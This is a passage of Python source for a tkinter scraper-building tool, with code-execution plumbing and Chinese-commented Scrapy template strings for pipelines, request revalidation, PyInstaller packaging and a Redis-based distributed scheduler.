temp_fr2 = Frame(fr,highlightthickness=lin)
lb = Label (temp_fr2,text='执行结果[Esc 显示/隐藏执行结果]')
cd = Text (temp_fr2,height=1,width=1,font=ft)
lb.pack(side=tkinter.TOP)
cd.pack(fill=tkinter.BOTH,expand=True,padx=pdx,pady=pdy)
# 在 tkinter 里面实现线程真的稍微有点累人的。
import queue
Q = queue.Queue() # 用来传递打印的数据
S = queue.Queue() # 用来传递脚本数据
def execute_func_window():
# 额外的线程有一个非常需要注意的地方,就是涉及到任何使用 tkinter 内的结构的时候一定不能在这里实现
# 一定都要使用 Queue 来传递参数。窗口自己带一个超级递归的循环。
nonlocal Q, S
Q.put('V|GETSCRIPT')
cs = S.get()
td = tempfile.mkdtemp()
tf = os.path.join(td,'temp.py')
with open(tf,'w',encoding='utf-8') as f:
f.write(cs)
s = sys.executable
s = s + ' ' + tf
import subprocess
p = subprocess.Popen(s, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, encoding='utf-8')
Q.put('V|DELETE')
Q.put('============================== start ==============================\n')
for line in iter(p.stdout.readline, ''):
if line:
Q.put(line)
else:
break
Q.put('============================== end ==============================')
p.wait()
p.stdout.close()
shutil.rmtree(td)
def loop_in_tkinter():
__very_unique_cd__ = None
nonlocal cd, Q, S
from .tab import nb
c = []
while Q.qsize():
try:
i = Q.get_nowait()
if i == 'V|DELETE':
cd.delete(0., tkinter.END)
elif i == 'V|GETSCRIPT':
cs = tx.get(0.,tkinter.END)
S.put(cs)
else:
try:
cd.insert(tkinter.END, i)
except:
cd.insert(tkinter.END, re.sub('[\uD800-\uDBFF][\uDC00-\uDFFF]|[\U00010000-\U0010ffff]','',i))
cd.see(tkinter.END)
cd.update()
except queue.Empty:
pass
nb.after(200, loop_in_tkinter)
loop_in_tkinter()
def execute_func():
threading.Thread(target=execute_func_window).start()
frame_setting[fr] = {}
frame_setting[fr]['type'] = 'code'
frame_setting[fr]['execute_func'] = execute_func
frame_setting[fr]['fr_temp2'] = temp_fr2 # 代码执行框,这里仍需挂钩esc按键显示/关闭该窗口
try:
from idlelib.colorizer import ColorDelegator
from idlelib.percolator import Percolator
p = ColorDelegator()
Percolator(tx).insertfilter(p)
except:
traceback.print_exc()
return fr
# 暂时废弃"后验证代码的功能"
post_verification_model = r"""
'''
# [后验证代码模板]
# 只需在正常请求前加上下面两段便可处理重验证的操作
# 该重验证包含了,原始请求的重新提交以及验证次数的接口暴露
# 并且加了这一段验证代码之后你只需要对验证更新的部分修改即可。
# 使用时只需要修改两处
# 1. 修改后验证请求的信息的请求信息
# 2. 修改后验证的更新请求配置的信息(通常更新cookie,已有基本模板)
def parse(self, response):
def revalidate(response):
times = response.meta.get('_revalidate_times') or 0
# 重验次数,为了测试,这里使用的条件是,重验次数少于2则直接重验
# 几乎就等于无条件重验证两次,在实际情况下请注意验证条件的编写
if times >= 2:
return True
if not revalidate(response):
# ============ 请修改此处的验证请求信息 =============
# 这里只需要传入重验证需要请求的信息即可,会自动重验证和重新请求本次验证失败的请求
rurl = 'https://www.baidu.com/'
rheaders = {}
rbody = None # body为None则验证请求为get,否则为post
yield self.revalidate_pack(response, rurl, rheaders, rbody)
return
# 后续是正常的解析操作
'''
def revalidate_pack(self, response, rurl=None, rheaders=None, rbody=None):
def mk_revalidate_request(_plusmeta):
method = 'GET' if rbody is None else 'POST'
meta = {}
meta['_plusmeta'] = _plusmeta
r = Request(
rurl,
method = method,
headers = rheaders,
body = rbody,
callback = self.revalidate_parse,
meta = meta,
dont_filter = True,
)
return r
_plusmeta = dict(
url = response.request.url,
headers = response.request.headers.to_unicode_dict(),
body = response.request.body.decode(),
method = response.request.method,
meta = response.request.meta,
cbname = response.request.callback.__name__,
)
return mk_revalidate_request(_plusmeta)
def revalidate_parse(self, response):
'''
验证请求结束,返回验证信息则更新一些信息,重新对原来未验证的请求进行验证
有时是通过 set-cookie 来实现更新 cookie 的操作,所以这里的 cookie 需要考虑更新的操作。
可以通过 response.headers.to_unicode_dict() 将返回的headers里面的 key value 转换成字符串
这样操作会少一些处理 bytes 类型的麻烦。
'''
def update(_plusmeta):
# ============ 请修改此处的验证跟新 =============
# 一般的后验证通常会在这里对 _plusmeta 中的 cookie 更新,由于to_unicode_dict函数的关系
# 所有的key都是小写,所以不用担心大小写问题,这里给了一个简单的小模板,如需更多功能请自行修改
# 这里也可以更新一些 self 的参数,将验证进行持久化
newcookie = response.headers.to_unicode_dict().get('set-cookie')
if newcookie:
_plusmeta['headers']['cookie'] = newcookie
_plusmeta['meta']['_revalidate_times'] = (_plusmeta['meta'].get('_revalidate_times') or 0) + 1
return _plusmeta
_plusmeta = update(response.meta['_plusmeta'])
url = _plusmeta['url']
method = _plusmeta['method']
headers = _plusmeta['headers']
body = _plusmeta['body']
meta = _plusmeta['meta']
cbname = _plusmeta['cbname']
r = Request(
url,
method = method,
headers = headers,
body = body,
callback = getattr(self, cbname),
meta = meta,
dont_filter = True,
)
yield r
"""
single_script_comment_part1 = '''
# 工具作者有时会偏向将某些临时生成的文件放到固定地址(例如桌面),统一管理,便于工作
# 若使用相对路径存放文件,则无需添加 file:/// 的前缀
desktoppath = os.path.join(os.path.expanduser("~"),'Desktop') # 获取桌面地址的通用代码
filename = 'file:///' + os.path.join(desktoppath, filename) # 使用绝对地址时存文件需增加前缀,注意
jobdir = os.path.join(desktoppath, jobdir)
'''.strip('\n')
_pyinstaller_scrapy = '--add-data "$sysexec\\Lib\\site-packages\\scrapy;scrapy" --add-data "$sysexec\\Lib\\email;email" --add-data "$sysexec\\Lib\\site-packages\\twisted;twisted" --add-data "$sysexec\\Lib\\site-packages\\queuelib;queuelib" --add-data "$sysexec\\Lib\\sqlite3;sqlite3" --add-binary "$sysexec\\DLLs\\_sqlite3.pyd;." --add-binary "$sysexec\\DLLs\\sqlite3.dll;." --exclude-module numpy --exclude-module scipy --exclude-module matplotlib --exclude-module PyQt5 --noupx'
_pyinstaller_scrapy = _pyinstaller_scrapy.replace('$sysexec', os.path.dirname(sys.executable))
single_script_comment_part2 = """
# 基础中间件介绍
# 通过实例动态增加中间件(解耦了之前只能通过配置中间件字符串),方便单脚本实现增加中间件功能,例如数据库存储方面的内容。
# 便于单脚本利用别人的中间件。(将别人的中间件脚本粘贴进该脚本,实例化添加即可。示例如下,解开注释到 #(1) 即可测试。)
# class VPipeline(object):
# def process_item(self, item, spider):
# print('\\n==== 这里是动态增加的“下载中间件”部分 ====\\n')
# return item
# for i in p.crawlers: i.engine.scraper.itemproc._add_middleware(VPipeline()) #(1)
# for i in p.crawlers: i.engine.scraper.spidermw._add_middleware(...) #(2) 这里的...需要一个对应的中间件对象
# for i in p.crawlers: i.engine.downloader.middleware._add_middleware(...) #(3) 这里的...需要一个对应的中间件对象
#1) 通过对象动态增加 itemmiddlewares,目前仅在数据管道部分这种处理方式比较常用(因默认item中间件为空,不会被默认配置影响)
#2) 通过对象动态增加 spidermiddlewares # i.engine.scraper.spidermw.middlewares # 当前全部“爬虫中间件”
#3) 通过对象动态增加 downloadermiddlewares # i.engine.downloader.middleware.middlewares # 当前全部“下载中间件”
#*) 注意: 2,3两种中间件的动态增加不常用。因 p.crawl 函数执行后就已初始化默认中间件顺序。新的中间件只能“后添加”,缺乏灵活。
# 【图片下载】 中间件介绍
# 图片相关的文件下载中间件的添加,注意:图片相关的资源需要绑定 spider 以及 crawler。示例如下。
# 在一般的脚本 item['src'] 中添加字符串下载地址即可,一个 item 一个字符串下载地址,便于管理。详细阅读下面代码。
# 解开下面的代码块即可使用该功能
# import logging, hashlib
# from scrapy.pipelines.images import ImagesPipeline
# from scrapy.exceptions import DropItem
# class VImagePipeline(ImagesPipeline):
# def get_media_requests(self, item, info):
# yield Request(item['src'], meta=item)
# def file_path(self, request, response=None, info=None):
# url = request if not isinstance(request, Request) else request.url
# image_name = request.meta.get('image_name') # 使用 item中的 image_name 字段作为文件名进行存储,没有该字段则使用 url的 md5作为文件名存储
# image_name = re.sub(r'[/\\\\:\\*"<>\\|\\?]', '_', image_name).strip()[:80] if image_name else hashlib.md5(url.encode()).hexdigest()
# return '%s.jpg' % image_name # 生成的图片文件名字,此处可增加多级分类路径(路径不存在则自动创建),使用 image_name 请注意重名可能性。
# def item_completed(self, results, item, info): # 判断下载是否成功
# k, v = results[0]
# if not k: logging.info('download fail {}'.format(item))
# else: logging.info('download success {}'.format(item))
# item['image_download_stat'] = 'success' if k else 'fail'
# item['image_path'] = v['path'] if k else None # 保留文件名地址
# return item
# for i in p.crawlers:
# vimage = VImagePipeline('./image',settings=i.settings) # 生成的文件地址,默认跟随脚本路径下生成的一个 image文件夹
# vimage.spiderinfo = vimage.SpiderInfo(i.spider)
# vimage.crawler = i
# i.engine.scraper.itemproc._add_middleware(vimage)
# 【数据库存储】 中间件介绍
# 当你需要直接将数据传入数据库的时候只需要在 item里面加一个字段: item['__mysql__'] = __mysql__
# 代码片如下:
# d['__mysql__'] = {
# 'host':'127.0.0.1', # str 【可选】 (默认 'localhost')
# 'port':3306 , # int 【可选】 (默认 3306)
# 'user':'user', # str 该配置是必须的
# 'password':'mypass', # str 该配置是必须的
# 'table':'mytable', # str 该配置是必须的(如果数据库内没有该表则会自动创建)注意!创建后的表结构不可改变。
# 'db':'mydb', # str 【可选】 (默认vrequest)(如果没有则自动创建)
# }
# 这个字段里面需要详细描述需要连接的数据库以及需要传入的表的名字,
# 注意,这里会根据 __mysql__ 的值的 hash 进行数据库连接池的创建,不同配置使用不同连接池,优化连接
# 之所以使用这样的接口处理是因为,这样可以使得一个任务能根据配置写入不同的数据库,非常方便
# 解开下面的代码块即可使用该功能
# import hmac, logging, traceback
# from twisted.enterprise import adbapi
# class VMySQLPipeline(object):
# dbn = {}
# def process_item(self, item, spider):
# mysql_config = item.pop('__mysql__', None) # 存储时自动删除配置
# if mysql_config and item:
# if type(mysql_config) is dict:
# table = mysql_config.pop('table', None)
# db = mysql_config.get('db', None) or 'vrequest'
# mysql_config.setdefault('charset','utf8mb4')
# mysql_config.setdefault('db', db)
# dbk = hmac.new(b'',json.dumps(mysql_config, sort_keys=True).encode(),'md5').hexdigest()
# if dbk not in self.dbn:
# self.dbn[dbk] = adbapi.ConnectionPool('pymysql', **mysql_config)
# self.init_database(self.dbn[dbk], mysql_config, db, table, item)
# self.dbn[dbk].runInteraction(self.insert_item, db, table, item)
# return item
# else:
# raise TypeError('Unable Parse mysql_config type:{}'.format(type(mysql_config)))
# else:
# return item
# def insert_item(self, conn, db, table, item):
# table_sql = ''.join(["'{}',".format(json.dumps(v, ensure_ascii=False).replace("'","\\\\'")) for k,v in item.items()])
# insert_sql = 'INSERT INTO `{}`.`{}` VALUES({})'.format(db, table, table_sql.strip(','))
# try:
# conn.execute(insert_sql)
# logging.info('insert sql success')
# except Exception as e:
# logging.info('insert sql fail: {}'.format(insert_sql))
# logging.error(traceback.format_exc())
# def init_database(self, pool, mysql_config, db, table, item):
# # 需要注意的是,在一些非常老的版本的mysql 里面并不支持 utf8mb4。这是 mysql 的设计缺陷,赶紧使用大于 5.5 版本的 mysql !
# # 创建db,创建表名,所有字段都以 MEDIUMTEXT 存储,用 json.dumps 保证了数据类型也能存储,后续取出时只需要每个值 json.loads 这样就能获取数据类型
# # 例如一个数字类型 123 -> json.dumps -> '123' -> json.loads -> 123,统一类型存储,取出时又能保证数据类型,这种处理会很方便
# # MEDIUMTEXT 最大能使用16M 的长度,所以对于一般的 html 文本也非常足够。如有自定义字段类型的需求,请注意修改该处。
# db, charset = mysql_config.pop('db'), mysql_config.get('charset')
# try:
# conn = pool.dbapi.connect(**mysql_config)
# cursor = conn.cursor()
# table_sql = ''.join(['`{}` MEDIUMTEXT NULL,'.format(str(k)) for k,v in item.items()])
# cursor.execute('Create Database If Not Exists {} Character Set {}'.format(db, charset))
# cursor.execute('Create Table If Not Exists `{}`.`{}` ({})'.format(db, table, table_sql.strip(',')))
# conn.commit(); cursor.close(); conn.close()
# except Exception as e:
# traceback.print_exc()
# for i in p.crawlers: i.engine.scraper.itemproc._add_middleware(VMySQLPipeline())
# 【视频下载】 中间件介绍
# 以下包含了比较主流的下载器的使用代码片,请任选一个进行使用。you-get 或 youtube-dl
# 如果存在一些 m3u8 的视频需要下载,那么建议下载 ffmpeg,并使用 youtube-dl 进行下载。
# ffmpeg如果没有配置环境变量则请将 ffmpeg_location 设置为 ffmpeg.exe 文件的路径即可。
# 解开下面的代码块即可使用该功能
# class VVideoPipeline(object):
# def process_item(self, item, spider):
# url = item['src']
# ### 【you-get】
# import you_get.common
# you_get.common.skip_existing_file_size_check = True # 防止发现重复视频时会强制要求输入“是否覆盖”,卡住程序,默认不覆盖
# you_get.common.any_download(url, output_dir='./video', merge=True, info_only=False)
# ### 【youtube-dl】
# # from youtube_dl import YoutubeDL
# # ytdl = YoutubeDL({'outtmpl': './video/%(title)s.%(ext)s', 'ffmpeg_location':None}) # 如果已配置ffmpeg环境则不用修改
# # info = ytdl.extract_info(url, download=True)
# return item
# for i in p.crawlers: i.engine.scraper.itemproc._add_middleware(VVideoPipeline())
# 如果使用 pyinstaller 打包 scrapy 脚本成为单个 exe,那也很方便
# 将下面的一行内容拼接到 “pyinstaller -F $你的scrapy单脚本.py ” 命令的后面就可以了。(这里为纯scrapy打包,若还有额外第三方库请按照类似方式添加)
# $pyinstaller_scrapy
# 注意,这里的打包默认去除最常见影响大小的库 numpy scipy matplotlib,如有需要引用请删除这里的部分 --exclude-module
""".strip('\n').replace('$pyinstaller_scrapy', _pyinstaller_scrapy)
_main_2_list_2_info_model = r'''
def mk_url_headers(d):
def quote_val(url): return re.sub(r'([\?&][^=&]*=)([^&]*)', lambda i:i.group(1)+quote_plus(unquote_plus(i.group(2))), url)
url = response.urljoin(d['href'])
url = quote_val(url)
headers = {
"accept-encoding": "gzip, deflate",
"accept-language": "zh-CN,zh;q=0.9",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36"
}
return url,headers
url,headers = mk_url_headers(d)
meta = {}
meta['proxy'] = self.proxy
meta['_plusmeta'] = {**_meta, **d} # keys word transfer
r = Request(
url,
headers = headers,
callback = self.parse_info,
meta = meta,
# method = 'POST', # if post is used, pls uncomment here and create the body parameter
# body = urlencode(body),
)
yield r
def parse_info(self, response):
d = response.meta.get('_plusmeta') or {}
d['someting1'] = 'pls fill in the fields collected on this page.'
d['someting2'] = 'pls fill in the fields collected on this page.'
d['someting3'] = 'pls fill in the fields collected on this page.'
print('------------------------------ split ------------------------------')
import pprint
pprint.pprint(d)
yield d
'''
_single_distributed = r'''# -*- coding: utf-8 -*-
def hook_to_scrapy_redis(namespace='default'):
import redis
from scrapy.http import Request
from scrapy.utils.python import to_unicode, to_native_str
from scrapy.utils.misc import load_object
def request_to_dict(request, spider=None):
if callable(request.callback): request.callback = _find_method(spider, request.callback)
if callable(request.errback): request.errback = _find_method(spider, request.errback)
d = {
'url': to_unicode(request.url), # urls should be safe (safe_string_url)
'callback': request.callback,
'errback': request.errback,
'method': request.method,
'headers': dict(request.headers),
'body': request.body,
'cookies': request.cookies,
'meta': request.meta,
'_encoding': request._encoding,
'priority': request.priority,
'dont_filter': request.dont_filter,
'flags': request.flags,
}
if type(request) is not Request:
d['_class'] = request.__module__ + '.' + request.__class__.__name__
return d
def request_from_dict(d, spider=None):
if d['callback'] and spider: d['callback'] = _get_method(spider, d['callback'])
if d['errback'] and spider: d['errback'] = _get_method(spider, d['errback'])
request_cls = load_object(d['_class']) if '_class' in d else Request
_cls = request_cls(
url=to_native_str(d['url']),
callback=d['callback'],
errback=d['errback'],
method=d['method'],
headers=d['headers'],
body=d['body'],
cookies=d['cookies'],
meta=d['meta'],
encoding=d['_encoding'],
priority=d['priority'],
dont_filter=d['dont_filter'],
flags=d.get('flags'))
return _cls
def _find_method(obj, func):
if obj: return func.__name__
raise ValueError("Function %s is not a method of: %s" % (func, obj))
def _get_method(obj, name):
name = str(name)
try:
return getattr(obj, name)
except AttributeError:
raise ValueError("Method %r not found in: %s" % (name, obj))
import pickle
class _serializer:
def loads(s): return pickle.loads(s)
def dumps(obj): return pickle.dumps(obj, protocol=-1)
class BaseQueue(object):
def __init__(self, server, spider, key):
self.server = server
self.spider = spider
self.key = key % {'spider': spider.name}
self.serializer = _serializer
def _encode_request(self, request): obj = request_to_dict(request, self.spider); return self.serializer.dumps(obj)
def _decode_request(self, encoded_request): obj = self.serializer.loads(encoded_request); return request_from_dict(obj, self.spider)
def __len__(self): raise NotImplementedError
def push(self, request): raise NotImplementedError
def pop(self, timeout=0): raise NotImplementedError
def clear(self): self.server.delete(self.key)
class FifoQueue(BaseQueue):
def __len__(self): return self.server.llen(self.key)
def push(self, request): self.server.lpush(self.key, self._encode_request(request))
def pop(self, timeout=0):
if timeout > 0:
data = self.server.brpop(self.key, timeout)
if isinstance(data, tuple):
data = data[1]
else:
data = self.server.rpop(self.key)
if data:
return self._decode_request(data)
import logging
from scrapy.dupefilters import BaseDupeFilter
from scrapy.utils.request import request_fingerprint
_logger = logging.getLogger(__name__)
class RFPDupeFilter(BaseDupeFilter):
logger = _logger
def __init__(self, server, key, debug=False):
self.server = server
self.key = key
self.debug = debug
self.logdupes = True
def request_seen(self, request): return self.server.sadd(self.key, self.request_fingerprint(request)) == 0
def request_fingerprint(self, request): return request_fingerprint(request)
def close(self, reason=''): self.clear()
def clear(self): self.server.delete(self.key)
def log(self, request, spider):
if self.debug:
msg = "Filtered duplicate request: %(request)s"
self.logger.debug(msg, {'request': request}, extra={'spider': spider})
elif self.logdupes:
msg = ("Filtered duplicate request %(request)s"
" - no more duplicates will be shown"
" (see DUPEFILTER_DEBUG to show all duplicates)")
self.logger.debug(msg, {'request': request}, extra={'spider': spider})
self.logdupes = False
import pprint
from datetime import datetime, timedelta
class RedisStatsCollector:
def __init__(self, crawler):
self._spider_id_task_format = TASK_STATS
self._dump = crawler.settings.getbool('STATS_DUMP')
self._local_max = 'DEPTH'
self._maxdp = 0
self.server = redis.StrictRedis(**REDIS_PARAMS)
self.server.ping()
self.encoding = self.server.connection_pool.connection_kwargs.get('encoding')
def get_stats(self, spider=None):
_stat = {}
for key,val in self.server.hgetall(self._spider_id_task_format).items():
key,val = key.decode(self.encoding),val.decode(self.encoding)
try:
if key in ['finish_reason']: _stat[key] = val
elif key in ['finish_time', 'start_time']: _stat[key] = datetime.strptime(val, "%Y-%m-%d %H:%M:%S.%f")
else: _stat[key] = int(val)
except:
_stat[key] = val
return _stat
def set_value(self, key, value, spider=None):
tname = self._spider_id_task_format
if type(value) == datetime: value = str(value + timedelta(hours=8)) # 将默认utc时区转到中国,方便我使用
self.server.hsetnx(tname, key, value)
def inc_value(self, key, count=1, start=0, spider=None):
if spider: self.server.hincrby(self._spider_id_task_format, key, count)
def max_value(self, key, value, spider=None):
if value > self._maxdp: self._maxdp = value; self.server.hset(self._spider_id_task_format, key, value)
def open_spider(self, spider): pass
def close_spider(self, spider, reason):
if self._dump:
_logger.info("Dumping Scrapy stats:\n" + pprint.pformat(self.get_stats(spider)), extra={'spider': spider})
class Scheduler(object):
def __init__(self, server, persist=False, flush_on_start=False, idle_before_close=0):
self.server = server
self.persist = persist
self.flush_on_start = flush_on_start
self.idle_before_close = idle_before_close
self.stats = None
self.queue_key = QUEUE_KEY
self.dupefilter_key = DUPEFILTER_KEY
def __len__(self): return len(self.queue)
@classmethod
def from_settings(cls, settings):
server = redis.StrictRedis(**REDIS_PARAMS)
server.ping()
return cls(server=server, **EXTRA_SETTING)
@classmethod
def from_crawler(cls, crawler):
instance = cls.from_settings(crawler.settings)
instance.stats = crawler.stats
return instance
def open(self, spider):
self.spider = spider
try: self.queue = FifoQueue(server=self.server, spider=spider, key=self.queue_key % {'spider': spider.name})
except TypeError as e: raise ValueError("Failed to instantiate queue class '%s': %s", self.queue_cls, e)
try: self.df = RFPDupeFilter(server=self.server, key=self.dupefilter_key % {'spider': spider.name}, debug=False)
except TypeError as e: raise ValueError("Failed to instantiate dupefilter class '%s': %s", self.dupefilter_cls, e)
if self.flush_on_start: self.flush()
if len(self.queue): spider.log("Resuming crawl (%d requests scheduled)" % len(self.queue))
def close(self, reason):
if not self.persist: self.flush()
def flush(self): self.df.clear(); self.queue.clear()
def enqueue_request(self, request):
if not request.dont_filter and self.df.request_seen(request): self.df.log(request, self.spider); return False
if self.stats: self.stats.inc_value('scheduler/enqueued/redis', spider=self.spider)
self.queue.push(request)
return True
def next_request(self):
block_pop_timeout = self.idle_before_close
request = self.queue.pop(block_pop_timeout)
if request and self.stats: self.stats.inc_value('scheduler/dequeued/redis', spider=self.spider)
return request
def has_pending_requests(self): return len(self) > 0
from scrapy import signals
from scrapy.core.scraper import Scraper
from scrapy.core.engine import ExecutionEngine
from scrapy.utils.misc import load_object
def __hook_init__(self, crawler, spider_closed_callback):
self.crawler = crawler
self.settings = crawler.settings
self.signals = crawler.signals
self.logformatter = crawler.logformatter
self.slot = None
self.spider = None
self.running = False
self.paused = False
self.scheduler_cls = Scheduler
downloader_cls = load_object(self.settings['DOWNLOADER'])
self.downloader = downloader_cls(crawler)
self.scraper = Scraper(crawler)
self._spider_closed_callback = spider_closed_callback
ExecutionEngine.__init__ = __hook_init__
_bak_next_request = ExecutionEngine._next_request
START_TOGGLE_HOOK = True
def __hook_next_request(self, spider):
nonlocal START_TOGGLE_HOOK
if START_TOGGLE_HOOK:
r = self.crawler.stats.server.hincrby(TASK_STATS, 'start_toggle_requests')
if r != 1: self.slot.start_requests = None # 让其他非首次启动的 start_requests 不执行
START_TOGGLE_HOOK = False
_bak_next_request(self, spider)
ExecutionEngine._next_request = __hook_next_request
import scrapy.spiders
from scrapy import signals
from scrapy.exceptions import DontCloseSpider
from scrapy.spiders import Spider
class RedisMixin(object):
redis_key = None
redis_batch_size = None
redis_encoding = None
server = None
def start_requests(self): return self.next_requests()
def setup_redis(self, crawler=None):
if self.server is not None: return
settings = crawler.settings
self.redis_key = QUEUE_KEY
self.redis_batch_size = settings.getint('CONCURRENT_REQUESTS')
self.server = redis.StrictRedis(**REDIS_PARAMS)
crawler.signals.connect(self.spider_idle, signal=signals.spider_idle)
def next_requests(self):
fetch_one = self.server.lpop
found = 0
while found < self.redis_batch_size:
data = fetch_one(self.redis_key)
if not data: break
req = self.make_request_from_data(data)
if req:
yield req
found += 1
else:
self.logger.debug("Request not made from data: %r", data)
if found:
self.logger.debug("Read %s requests from '%s'", found, self.redis_key)
def make_request_from_data(self, data): return self.make_requests_from_url(data.decode(self.redis_encoding))
def schedule_next_requests(self):
for req in self.next_requests(): self.crawler.engine.crawl(req, spider=self)
def spider_idle(self):
self.schedule_next_requests()
raise DontCloseSpider
class RedisSpider(RedisMixin, Spider):
@classmethod
def from_crawler(self, crawler, *args, **kwargs):
obj = super(RedisSpider, self).from_crawler(crawler, *args, **kwargs)
obj.setup_redis(crawler)
return obj
scrapy.Spider = RedisSpider
import scrapy.spiders
import scrapy.extensions.telnet
import scrapy.extensions.memusage
import scrapy.extensions.logstats
import scrapy.statscollectors
scrapy.extensions.telnet.TelnetConsole.__init__ = lambda self,_:None # 关闭这个插件,我不用(这种关闭插件的方式小孩子可不要学哦~)
scrapy.extensions.memusage.MemoryUsage.__init__ = lambda self,_:None # 同样的理由,我不用
scrapy.extensions.logstats.LogStats.from_crawler = lambda self:None # 同样的理由,我不用
scrapy.statscollectors.MemoryStatsCollector = RedisStatsCollector # 挂钩默认日志,让其自动支持redis日志(这种抽象的钩子技术小孩子可不要学哦~)
import json
import scrapy.pipelines
from scrapy.core.spidermw import SpiderMiddlewareManager
TASK_COLLECTION = None
class VRedisPipeline(object):
def __init__(self):
self.key = TASK_COLLECTION
self.server = redis.StrictRedis(**REDIS_PARAMS)
self.server.ping()
def process_item(self, item, spider):
if self.key:
self.server.lpush(self.key, json.dumps(item))
return item
def __hook_scraper_init__(self, crawler):
self.slot = None
self.spidermw = SpiderMiddlewareManager.from_crawler(crawler)
itemproc_cls = scrapy.pipelines.ItemPipelineManager()
self.itemproc = itemproc_cls.from_crawler(crawler)
self.itemproc._add_middleware(VRedisPipeline()) # 挂钩scraper的初始化,在此刻增加redis写入中间件
self.concurrent_items = crawler.settings.getint('CONCURRENT_ITEMS')
self.crawler = crawler
self.signals = crawler.signals
self.logformatter = crawler.logformatter
import scrapy.core.scraper
scrapy.core.scraper.Scraper.__init__ = __hook_scraper_init__
EXTRA_SETTING = {
'persist': True, # 任务(意外或正常)结束是否保留过滤池或任务队列(使用默认配置即可)
'flush_on_start': False, # 任务开始时是否需要进行队列和过滤池的清空处理(使用默认配置即可)
'idle_before_close': 0, # 约等于redis中的(包括且不限于)函数 brpop(key,timeout) 中的参数 timeout
}
REDIS_PARAMS = {
'host':'127.0.0.1', # 最需要主动配置的部分1
'port':6379, # 最需要主动配置的部分2
'password': None, # 最需要主动配置的部分3
'socket_timeout': 30,
'socket_connect_timeout': 30,
'retry_on_timeout': True,
'encoding': 'utf-8',
}
QUEUE_KEY = 'scrapy_redis:{}:TASK_QUEUE'.format(namespace) # 任务队列(当任务正常执行完,必然是空)
DUPEFILTER_KEY = 'scrapy_redis:{}:DUPEFILTER'.format(namespace) # 过滤池(用于放置每个请求的指纹)
TASK_STATS = 'scrapy_redis:{}:TASK_STATS'.format(namespace) # 任务状态日志
TASK_COLLECTION = 'scrapy_redis:{}:COLLECTION'.format(namespace) # 数据收集的地方(默认使用redis收集json.dumps的数据),注释这行数据就不收集到redis
# 使用这个函数后爬虫自动变成分布式(注意要先设置好 redis 连接的配置)
# 使用时尽量一个任务一个 namespace,因为一旦任务启动,相同 namespace 下的爬虫的 start_requests 函数只会执行一次。
# 除非主动修改 TASK_STATS 中的 start_toggle_requests 字段为0,新的任务才会执行 start_requests
hook_to_scrapy_redis(namespace='vilame') # 不想用分布式直接注释掉该行函数执行即可。
''' + '\n'*16
_single_script_middleware_new = '''# -*- coding: utf-8 -*-
# 挂钩中间件加载的处理,让通过“字符串”加载中间件的函数能够同时兼容用“类”加载中间件
import scrapy.utils.misc
import scrapy.utils.deprecate
_bak_load_object = scrapy.utils.misc.load_object
_bak_update_classpath = scrapy.utils.deprecate.update_classpath
def _load_object(path_or_class):
try: return _bak_load_object(path_or_class)
except: return path_or_class
def _update_classpath(path_or_class):
try: return _bak_update_classpath(path_or_class)
except: return path_or_class
scrapy.utils.misc.load_object = _load_object
scrapy.utils.deprecate.update_classpath = _update_classpath
# 如果使用 pyinstaller 打包 scrapy 脚本成为单个 exe,打包命令如下。(注意修改脚本名称)
# pyinstaller -F $你的scrapy单脚本.py '''+_pyinstaller_scrapy+'''
# 注意,这里的打包默认去除最常见影响大小的库 numpy scipy matplotlib PyQt5,如有需要引用请删除这里的部分 --exclude-module
# 基础 item 中间件模板
class VPipeline(object):
def process_item(self, item, spider):
print('\\n==== 这里是动态增加的“下载中间件”部分 ====\\n')
return item
# 图片下载 item 中间件
import logging, hashlib
from scrapy.pipelines.images import ImagesPipeline
from scrapy.exceptions import DropItem
class VImagePipeline(ImagesPipeline):
IMAGES_STORE = None
def __init__(self, store_uri, download_func=None, settings=None):
super().__init__(store_uri, download_func, settings)
VImagePipeline.IMAGES_STORE = settings.get('IMAGES_STORE')
def get_media_requests(self, item, info):
headers = {
"accept-encoding": "gzip, deflate", # auto delete br encoding. cos requests and scrapy can not decode it.
"accept-language": "zh-CN,zh;q=0.9",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36"
}
item = item.copy()
item['download_timeout'] = 180 # 下载单张图片的时间限制
yield Request(item['src'], headers=headers, meta=item)
def file_path(self, request, response=None, info=None):
url = request if not isinstance(request, Request) else request.url
image_name = request.meta.get('image_name') # 使用 item中的 image_name 字段作为文件名进行存储,没有该字段则使用 url的 md5作为文件名存储
image_name = re.sub(r'[/\\\\:\\*"<>\\|\\?]', '_', image_name).strip()[:80] if image_name else hashlib.md5(url.encode()).hexdigest()
return '%s.jpg' % image_name # 生成的图片文件名字,此处可用/符号增加多级分类路径(路径不存在则自动创建),使用 image_name 请注意重名可能性。
def item_completed(self, results, item, info): # 判断下载是否成功
k, v = results[0]
item['image_download_stat'] = 'success' if k else 'fail'
item['image_path'] = os.path.join(VImagePipeline.IMAGES_STORE, v['path']).replace('\\\\', '/') if k else None # 保留文件名地址
if not k: logging.info('download fail {}'.format(item))
else: logging.info('download success {}'.format(item))
return item
# 文件下载 item 中间件
import logging, hashlib
from scrapy.pipelines.files import FilesPipeline
class VFilePipeline(FilesPipeline):
FILES_STORE = None
def __init__(self, store_uri, download_func=None, settings=None):
super().__init__(store_uri, download_func, settings)
VFilePipeline.FILES_STORE = settings.get('FILES_STORE')
def get_media_requests(self, item, info):
headers = {
"accept-encoding": "gzip, deflate", # auto delete br encoding. cos requests and scrapy can not decode it.
"accept-language": "zh-CN,zh;q=0.9",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36"
}
item = item.copy()
item['download_timeout'] = 180 # 下载单条文件的时间限制
yield Request(item['src'], headers=headers, meta=item)
def file_path(self, request, response=None, info=None):
url = request if not isinstance(request, Request) else request.url
file_name = request.meta.get('file_name')
file_type = request.meta.get('file_type')
